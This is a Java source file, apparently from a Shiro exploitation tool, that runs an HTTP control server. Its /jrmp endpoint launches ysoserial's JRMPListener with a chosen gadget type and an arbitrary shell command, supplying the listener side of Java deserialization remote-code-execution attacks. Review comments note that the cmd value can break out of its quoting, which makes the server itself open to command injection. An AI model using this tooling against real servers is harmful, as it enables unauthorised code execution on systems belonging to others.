package com.shiroexploit.server;

import com.shiroexploit.util.PayloadType;
import com.shiroexploit.util.Tools;
import com.sun.net.httpserver.HttpContext;
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpServer;
import java.io.File;
import java.io.IOException;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.URI;
import java.nio.charset.StandardCharsets;
import java.util.HashSet;
import java.util.Set;

/**
 * Small HTTP control server.
 *
 * <p>Serves two endpoints:
 * <ul>
 *   <li>{@code /jrmp?type=...&cmd=...}: stops any listener on the JRMP port via
 *       {@code Tools.killJRMPListener} and, if {@code type} is a known payload name and
 *       {@code cmd} is present, launches {@code ysoserial.exploit.JRMPListener} from
 *       {@code ysoserial.jar} in the working directory on a background thread.</li>
 *   <li>{@code /echo}: always answers {@code OK} (liveness check).</li>
 * </ul>
 * Every handled request is answered with HTTP 200 and body {@code OK}.
 */
public class BasicHTTPServer {
    private static int listeningPort = 8080;
    private static int JRMPPort = 8088;
    // Only referenced by the disabled /gadget and /result handlers below.
    private static Set<String> memcache = new HashSet<>();
    // Last payload type a listener was started for; used only to avoid repeating the log line.
    private static String previousType = "";

    /**
     * Starts the HTTP server.
     *
     * @param args optional {@code [httpPort [jrmpPort]]}; missing values keep the defaults
     *             (8080 and 8088)
     * @throws IOException if the HTTP server cannot bind to the listening port
     * @throws NumberFormatException if a supplied port is not an integer
     */
    public static void main(String[] args) throws IOException {
        // Ports given on the command line override the defaults; each one is applied independently.
        if (args.length > 0) {
            listeningPort = Integer.parseInt(args[0]);
        }
        if (args.length > 1) {
            JRMPPort = Integer.parseInt(args[1]);
        }

        HttpServer httpServer = HttpServer.create(new InetSocketAddress(listeningPort), 0);
        httpServer.createContext("/jrmp", BasicHTTPServer::handleJRMPRequest);
//        httpServer.createContext("/gadget", BasicHTTPServer::handleGadgetRequest);
//        httpServer.createContext("/result", BasicHTTPServer::handleResultRequest);
        httpServer.createContext("/echo", BasicHTTPServer::handleEchoRequest);
        httpServer.start();
        System.out.println("[*] Start HTTP Service at port " + listeningPort);
        System.out.println("[*] JRMP Service will start at port " + JRMPPort);
    }

    /** Answers every request with HTTP 200 {@code OK}. */
    private static void handleEchoRequest(HttpExchange exchange) throws IOException {
        sendOk(exchange);
    }

//    private static void handleResultRequest(HttpExchange exchange) throws IOException{
//        StringBuffer sb = new StringBuffer();
//        for(String str : memcache){
//            sb.append(str);
//            sb.append(",");
//        }
//
//        if(sb.length() > 0){
//            sb.deleteCharAt(sb.length()-1);
//        }
//
//        String response = sb.toString();
//        exchange.sendResponseHeaders(200, response.getBytes().length);
//        OutputStream os = exchange.getResponseBody();
//        os.write(response.getBytes());
//        os.close();
//    }
//
//    private static void handleGadgetRequest(HttpExchange exchange) throws IOException{
//        URI requestURI = exchange.getRequestURI();
//        String query = requestURI.getQuery();
//
//        // The type parameter is only printed, it is not actually processed
//        String type = parse(query, "type");
//        String uuid = parse(query,"uuid");
//        if(type != null && isValidParameter(type) && uuid != null){
//            memcache.add(uuid);
//            System.out.println("[+] Received a valid gadget request: " + type);
//        }else{
//            System.out.println("[-] Received a invalid request: " + requestURI);
//        }
//
//        String response = "OK";
//        exchange.sendResponseHeaders(200, response.getBytes().length);
//        OutputStream os = exchange.getResponseBody();
//        os.write(response.getBytes());
//        os.close();
//    }

    /**
     * Handles {@code /jrmp}: stops any listener on the JRMP port, then starts a new
     * JRMPListener if the request carries a valid {@code type} and a {@code cmd}.
     * Always replies HTTP 200 {@code OK}, even for invalid requests.
     */
    private static void handleJRMPRequest(HttpExchange exchange) throws IOException {
        URI requestURI = exchange.getRequestURI();
        // NOTE(review): getQuery() returns the *decoded* query, so a percent-encoded '&' inside
        // cmd turns into a parameter separator before parse() splits on it.
        String query = requestURI.getQuery();

        // The listener is stopped for every request, valid or not.
        Tools.killJRMPListener(JRMPPort);

        String type = parse(query, "type");
        String cmd = parse(query, "cmd");

        if (type != null && isValidParameter(type) && cmd != null) {
            // NOTE(review): cmd is embedded inside double quotes in a single command string; a cmd
            // containing '"' can escape that quoting, depending on how Tools.exec runs the string.
            Thread listenerThread = new Thread(() -> {
                String command = "java -cp \"" + System.getProperty("user.dir") + File.separator
                        + "ysoserial.jar\" ysoserial.exploit.JRMPListener " + JRMPPort + " " + type
                        + " \"" + cmd + "\"";
                Tools.exec(command);
            });
            listenerThread.start();
            // Log only when the payload type changes, to keep repeated requests quiet.
            if (!previousType.equalsIgnoreCase(type)) {
                System.out.println("[*] Start JRMPListener for payload " + type);
                previousType = type;
            }
        } else {
            System.out.println("[-] Received an invalid request: " + requestURI);
        }

        sendOk(exchange);
    }

    /**
     * Writes an HTTP 200 response with body {@code OK} and closes the response stream,
     * which also terminates the exchange. The stream is closed even if the write fails.
     */
    private static void sendOk(HttpExchange exchange) throws IOException {
        byte[] body = "OK".getBytes(StandardCharsets.UTF_8);
        exchange.sendResponseHeaders(200, body.length);
        try (OutputStream os = exchange.getResponseBody()) {
            os.write(body);
        }
    }

    /**
     * Looks up a parameter in a {@code key=value&key=value} query string.
     *
     * @param query the query string; may be {@code null}
     * @param name  parameter name, matched case-insensitively
     * @return the value of the first matching parameter (everything after its first {@code '='},
     *         possibly empty), or {@code null} if the query is null/empty or has no such key
     */
    private static String parse(String query, String name) {
        if (query == null || query.isEmpty()) {
            return null;
        }
        for (String param : query.split("&")) {
            int eq = param.indexOf('=');
            if (eq < 0) {
                // A bare flag (or empty segment from "&&") has no value: skip it instead of
                // aborting the whole lookup.
                continue;
            }
            if (param.substring(0, eq).equalsIgnoreCase(name)) {
                return param.substring(eq + 1);
            }
        }
        return null;
    }

    /**
     * Returns whether {@code type} matches (case-insensitively) the name of any {@link PayloadType}.
     */
    private static boolean isValidParameter(String type) {
        for (PayloadType candidate : PayloadType.values()) {
            if (type.equalsIgnoreCase(candidate.getName())) {
                return true;
            }
        }
        return false;
    }
}
